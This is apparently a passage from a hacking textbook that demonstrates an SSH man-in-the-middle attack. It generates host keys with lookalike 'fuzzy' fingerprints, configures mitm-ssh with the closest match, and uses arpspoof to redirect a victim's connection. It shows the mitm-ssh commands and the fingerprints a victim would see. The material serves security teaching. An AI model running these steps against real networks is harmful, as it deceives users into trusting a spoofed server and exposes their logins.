Graphics Programs Reference
In-Depth Information
1024 ba:06:7c:d2:15:a2:d3:0d:bf:f0:d4:5d:c6:10:22:90 /tmp/ssh-rsa04.pub
1024 ba:06:3f:22:1b:44:7b:db:41:27:54:ac:4a:10:29:e0 /tmp/ssh-rsa05.pub
1024 ba:06:78:dc:be:a6:43:15:eb:3f:ac:92:e5:8e:c9:50 /tmp/ssh-rsa06.pub
1024 ba:06:7f:da:ae:61:58:aa:eb:55:d0:0c:f6:13:61:30 /tmp/ssh-rsa07.pub
1024 ba:06:7d:e8:94:ad:eb:95:d2:c5:1e:6d:19:53:59:a0 /tmp/ssh-rsa08.pub
1024 ba:06:74:a2:c2:8b:a4:92:e1:e1:75:f5:19:15:60:a0 /tmp/ssh-rsa09.pub
reader@hacking:~ $ ssh-keygen -l -f ./loki.hostkey
1024 ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0 192.168.42.72
r
eader@hacking:~ $
From the 10 generated key pairs, the one that seems to look the most
similar can be determined by eye. In this case, ssh-rsa02.pub, shown in bold,
was chosen. Regardless of which key pair is chosen, though, it will certainly
look more like the original fingerprint than any randomly generated key
would.
This new key can be used with mitm-ssh to make for an even more
effective attack. The location for the host key is specified in the config-
uration file, so using the new key is simply matter of adding a
HostKey
line
in /usr/local/etc/mitm-ssh_config, as shown below. Since we need to remove
the
Protocol 1
line we added earlier, the output below simply overwrites the
configuration file.
reader@hacking:~ $ echo "HostKey /tmp/ssh-rsa02" > /usr/local/etc/mitm-ssh_config
reader@hacking:~ $ mitm-ssh 192.168.42.72 -v -n -p 2222Using static route to 192.168.42.72:22
Disabling protocol version 1. Could not load host key
S
SH MITM Server listening on 0.0.0.0 port 2222.
In another terminal window, arpspoof is running to redirect the traffic
to mitm-ssh, which will use the new host key with the fuzzy fingerprint. The
output below compares the output a client would see when connecting.
Normal Connection
iz@tetsuo:~ $ ssh jose@192.168.42.72
The authenticity of host '192.168.42.72 (192.168.42.72)' can't be established.
RSA key fingerprint is ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0.
A
re you sure you want to continue connecting (yes/no)?
MitM-Attacked Connection
iz@tetsuo:~ $ ssh jose@192.168.42.72
The authenticity of host '192.168.42.72 (192.168.42.72)' can't be established.
RSA key fingerprint is ba:06:7e:b2:64:13:cf:0f:a4:69:17:d0:60:62:69:a0.
Are you sure you want to continue connecting (yes/no)?
Can you immediately tell the difference? These fingerprints look similar
enough to trick most people into simply accepting the connection.
